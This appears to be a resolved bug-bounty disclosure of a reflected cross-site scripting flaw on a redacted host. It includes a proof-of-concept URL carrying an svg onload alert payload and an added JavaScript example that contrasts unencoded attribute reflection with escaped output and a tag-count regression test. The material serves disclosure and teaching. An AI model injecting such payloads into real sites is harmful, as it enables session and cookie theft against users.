Reflected XSS at https://██████/██████████ via "████████" parameter
Medium
Vulnerability Details
There is a reflected cross-site scripting issue at the following URL:
[https://█████/████](https://██████████/██████████)
Proof Of Concept
https://████████/███████?text=&███=%22%3E%3Csvg/onload=alert(1)%3E████
███████
Best Regards
@pelegn
## Impact
Cookies Exfiltration
SOAP Bypass
CORS Bypass
Executing JavaScript on the victim's behalf
## System Host(s)
██████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
Navigate to https://█████████/███?text=&███████=%22%3E%3Csvg/onload=alert(1)%3E██████
## Suggested Mitigation/Remediation Actions
## Report Stats
- Report ID: 1457413
- State: Closed
- Substate: resolved
- Upvotes: 3
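
The proof-of-concept value starts with `">`, which is consistent with the parameter being reflected inside a double-quoted HTML attribute. Assuming that context, the following added example (not part of the original report or the affected application's code) puts the unencoded reflection beside an output-encoded one; the parameter name `q`, the `<input>` markup and all function names are hypothetical, since the real ones are redacted.

```javascript
// Added example. "q", the <input> markup and every function name here are
// hypothetical stand-ins; the real parameter and endpoint are redacted.

// Constructed sample: same query-string shape as the report's proof of concept.
const SAMPLE_QUERY = "text=&q=%22%3E%3Csvg/onload=alert(1)%3E";

// URL-decode one parameter the way a server-side framework would.
function reflectedValue(query, name) {
  return new URLSearchParams(query).get(name) ?? "";
}

// Vulnerable pattern: decoded input concatenated into a quoted attribute.
// A `"` in the value closes the attribute and `>` closes the tag.
function renderVulnerable(value) {
  return '<input type="text" name="q" value="' + value + '">';
}

// Characters that can terminate an attribute value or start markup.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

function escapeHtmlAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened pattern: encode at the point of output, for the attribute context.
function renderSafe(value) {
  return '<input type="text" name="q" value="' + escapeHtmlAttr(value) + '">';
}

// Regression check for a test suite: the template emits exactly one element,
// so any additional tag opener means user input escaped its attribute.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

const value = reflectedValue(SAMPLE_QUERY, "q");
console.log("vulnerable:", renderVulnerable(value), "tags =", countTags(renderVulnerable(value)));
console.log("encoded:   ", renderSafe(value), "tags =", countTags(renderSafe(value)));
```

The same tag-count assertion can run in CI against the real template so that a later change which drops the encoding fails the build.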